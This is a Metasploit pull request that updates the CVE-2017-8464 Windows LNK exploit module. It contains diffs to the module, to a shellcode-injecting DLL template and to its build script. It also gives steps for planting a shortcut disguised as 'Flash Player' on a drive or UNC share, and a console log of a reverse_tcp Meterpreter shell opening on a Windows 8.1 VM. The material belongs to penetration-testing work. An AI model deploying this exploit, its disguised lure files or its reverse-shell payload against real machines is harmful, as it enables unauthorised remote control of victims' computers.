### PR TITLE
Update the CVE-2017-8464 module

### DIFF
--- a/data/exploits/cve-2017-8464/src/build.sh
+++ b/data/exploits/cve-2017-8464/src/build.sh
@@ -6,11 +6,10 @@ CCx64="x86_64-w64-mingw32"
 
 ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
 ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
-${CCx64}-strip -s temp.dll -o template_x64_windows.dll
+${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
 rm -f temp.dll *.o
 
 ${CCx86}-gcc -c -Os template.c -Wall -shared
 ${CCx86}-dllwrap --def template.def *.o -o temp.dll
-${CCx86}-strip -s temp.dll -o template_x86_windows.dll
+${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
 rm -f temp.dll *.o
-

--- a/data/exploits/cve-2017-8464/src/template.c
+++ b/data/exploits/cve-2017-8464/src/template.c
@@ -22,13 +22,13 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 		ExecutePayload();
 		break;
 
-        case DLL_PROCESS_DETACH:
+		case DLL_PROCESS_DETACH:
 		break;
 
-        case DLL_THREAD_ATTACH:
+		case DLL_THREAD_ATTACH:
 		break;
 
-        case DLL_THREAD_DETACH:
+		case DLL_THREAD_DETACH:
 		break;
 	}
 
@@ -69,7 +69,7 @@ void ExecutePayload(void)
 	inline_bzero(&si, sizeof(si));
 	si.cb = sizeof(si);
 
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	// Create a suspended process, write shellcode into stack, resume it
 	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
 		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
 		GetThreadContext(pi.hThread, &ctx);

--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -17,18 +17,23 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'            => 'LNK Code Execution Vulnerability',
         'Description'     => %q{
-          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
 
           This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
           similar except an additional SpecialFolderDataBlock is included. The folder ID set
           in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
+
+          If not PATH is specified, the module will use drive letters D through Z so the files
+          may be placed in the root path of a drive such as a shared VM folder or USB drive.
         },
         'Author'          =>
           [
-            'Uncredited',   # vulnerability discovery
-            'Yorick Koster' # msf module
+            'Uncredited',      # vulnerability discovery
+            'Yorick Koster',   # msf module
+            'Spencer McIntyre' # msf module
           ],
         'License'         => MSF_LICENSE,
         'References'      =>
@@ -56,8 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
             [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
           ],
-        'DefaultTarget' => 0, # Default target is Automatic
-        'DisclosureDate' => 'Jun 13 2017'
+        'DefaultTarget'   => 0, # Default target is Automatic
+        'DisclosureDate'  => 'Jun 13 2017'
       )
     )
 
@@ -65,13 +70,15 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
         OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
-        OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
+        OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])
       ]
     )
 
     register_advanced_options(
       [
-        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
+        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
@@ -87,14 +94,14 @@ class MetasploitModule < Msf::Exploit::Remote
     dll_path = store_file(dll, dll_name)
     print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
 
-    if datastore['DRIVE']
-      lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
+    if datastore['PATH']
+      lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
       lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
       lnk_path = store_file(lnk, lnk_filename)
-      print_status("#{lnk_path} created, copy to the target USB drive")
+      print_status("#{lnk_path} created, copy to the target paths")
+
     else
-      # HACK: the vulnerability doesn't appear to work with UNC paths
-      # Create LNK files to different drives instead
+      # HACK: Create LNK files to different drives instead
       # Copying all the LNK files will likely trigger this vulnerability
       ('D'..'Z').each do |i|
         fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
@@ -108,9 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_link(path)
+    vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = "Flash Player\x00" # LNK Display Name
-    comment = "Manage Flash Player Settings\x00"
+    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
+    comment = datastore['LNK_COMMENT'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [

--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
 
-          If not PATH is specified, the module will use drive letters D through Z so the files
+          If no PATH is specified, the module will use drive letters D through Z so the files
           may be placed in the root path of a drive such as a shared VM folder or USB drive.
         },
         'Author'          =>
@@ -77,14 +77,14 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options(
       [
         OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
-        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
-        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
+        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
 
   def exploit
-    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
     arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
     datastore['EXE::Path'] = path
     datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_link(path)
     vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
-    comment = datastore['LNK_COMMENT'].dup << "\x00"
+    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
+    comment = datastore['LnkComment'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [


### PR DESCRIPTION
## Overview
This PR makes some changes to the existing CVE-2017-8464 module to make it a bit more flexible. Instead of forcing the user to place the malicious files in the root of a drive, the user is now allowed to specify a specific path. The old functionality of trying each drive letter will still be used when ``PATH`` is
not set. Additionally a specific drive can be used by setting ``PATH`` to the drive such as ``set PATH E:\\``.

In my testing I was able to get the payload to load over a UNC path on both Windows 10 x64 and Windows 8.1 x64.

## Verification

- [x] Start `msfconsole`
- [x] Start a payload handler for Windows
- [x] Use `exploits/windows/fileformat/cve_2017_8464_lnk_rce`
- [x] Set the PATH to an explicit path of where the `.cpl|.dll` file will be placed
- [x] Update the display name with the advanced `LNK_DISPLAY_NAME` option
- [x] Run `exploit` and copy the files to the path chosen in the previous step on the victim
- [x] Get a session when viewing the `.lnk` file in Explorer
- [x] Verify the the LNK Display Name has been set to what the user specified

## Checking The LNK Display Name
  1. Right click the link, select Properties
  1. Go to the Shortcut tab
  1. The Display Name is shown in the Target Type field

## Example Usage
In this example the `Downloads` directory is shared via Virtual Box to the
target Windows 8.1 x64 VM and is accessible from the UNC path
`\\vboxsrv\Downloads`.

```
Sep30 18:32:48|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > show options

Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name      Current Setting                    Required  Description
   ----      ---------------                    --------  -----------
   DLLNAME   FlashPlayerCPLApp.cpl              no        The DLL file containing the payload
   FILENAME  Flash Player.lnk                   no        The LNK file
   PATH      \\vboxsrv\Downloads\cve-2017-8464  no        An explicit path to where the files will be hosted


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.254.110  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


Sep30 18:32:52|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > exploit

[*] [2017.09.30-18:32:54] /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl created, copy it to the root folder of the target USB drive
[*] [2017.09.30-18:32:54] Generating LNK file to load: \\vboxsrv\Downloads\cve-2017-8464\FlashPlayerCPLApp.cpl
[*] [2017.09.30-18:32:54] /home/steiner/.msf4/local/FlashPlayer.lnk created, copy to the target paths
Sep30 18:32:54|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > cp /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl ~/Downloads/cve-2017-8464
[*] exec: cp /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl ~/Downloads/cve-2017-8464

Sep30 18:32:57|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > cp /home/steiner/.msf4/local/FlashPlayer.lnk ~/Downloads/cve-2017-8464
[*] exec: cp /home/steiner/.msf4/local/FlashPlayer.lnk ~/Downloads/cve-2017-8464

Sep30 18:33:08|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) >
[*] [2017.09.30-18:33:15] Sending stage (205379 bytes) to 192.168.254.110
[*] Meterpreter session 5 opened (192.168.254.110:4444 -> 192.168.254.110:45842) at 2017-09-30 18:33:15 -0400

Sep30 18:33:21|192.168.254.110|S:1 J:1 exploit(cve_2017_8464_lnk_rce) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
